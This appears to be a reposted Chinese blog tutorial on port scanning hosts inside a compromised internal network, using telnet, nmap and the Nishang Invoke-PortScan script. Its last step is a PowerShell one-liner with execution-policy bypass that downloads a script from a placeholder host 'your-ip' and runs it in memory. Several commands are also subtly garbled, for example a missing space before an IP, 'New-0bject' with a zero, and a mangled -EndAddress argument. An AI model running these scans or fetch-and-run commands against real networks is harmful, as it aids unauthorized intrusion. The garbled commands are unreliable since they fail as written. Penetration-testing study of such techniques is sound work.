当前位置:   article > 正文

内网安全-信息收集-内网资源探测-内网端口扫描_内网安全扫描

内网安全扫描

内网端口扫描

简介

端口是一切网络入侵的入口。通过对内网主机进行端口扫描,测试人员可以确定目标主机上开放的服务类型、服务版本,并查找相应的漏洞进行攻击。测试人员可以根据目标主机的情况,上传工具进行扫描,也可以借助内网代理或路由转发对目标主机发起扫描。

1利用Telnet 探测端口

   Telnet是进行远程登录的标准协议和主要方式,为用户提供了在本地计算机上完成远程主机工作的能力。telnet命令可以简单测试指定的端口号是正常打开还是关闭状态。
   telnet <IP> <Port>
  • 1
  • 2

2利用 Nmap进行端口扫描

Nmap是一个十分强大的端口扫描工具,在实际利用中可以借助内网代理对内网主机进行端口扫描。关于 Nmap的使用,更多使用方法请参考Nmap官方手册。下面仅给出几个常用的扫描命令。

执行以下命令,扫描目标主机的指定端口
nmap -p 80,88,135,139,443,8080,3306,3389 192.168.204.147

执行以下命令,扫描目标主机开放的全部端口
nmap -sS -p 1-6553510.10.10.11

执行以下命令,扫描并获取目标主机指定端口上开放的服务版本
nmap -sV -p 80,88,135,139,443,8080,3306,3389 10.10.10.11

3利用PowerShell进行端口扫描

NiShang是基于PowerShell 的渗透测试专用框架,集成了各种脚本和 Payload,广泛用于渗透测试的各阶段。

NiShang的 Scan模块中也有一个Invoke-PortsCan.ps1脚本,可以用来对主机进行端口扫描(具体见 Github 上的相关网页)。

执行以下命令,对内网的一个主机范围执行默认的端口扫描:
Invoke-PortScan -StartAddress 192.168.204.1 —EndAddress 192.168.204.254 -ResolveHost -ScanPort

执行以下命令,对内网中的一个主机范围扫描指定的端口
powershell.exe -exec bypass -Command “IEX(New-0bject Net.WebClient). DownloadString(‘http://your-ip:;port/Invoke-portscan.ps1’);Invoke-PortScan -StartAddress 192.168.204.1 EndAddress-192.168.204.254-ResolveHost -ScanPort -Port 80, 88, 135, 139,443,8080,3306,3389”

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/503194
推荐阅读
相关标签
  

闽ICP备14008679号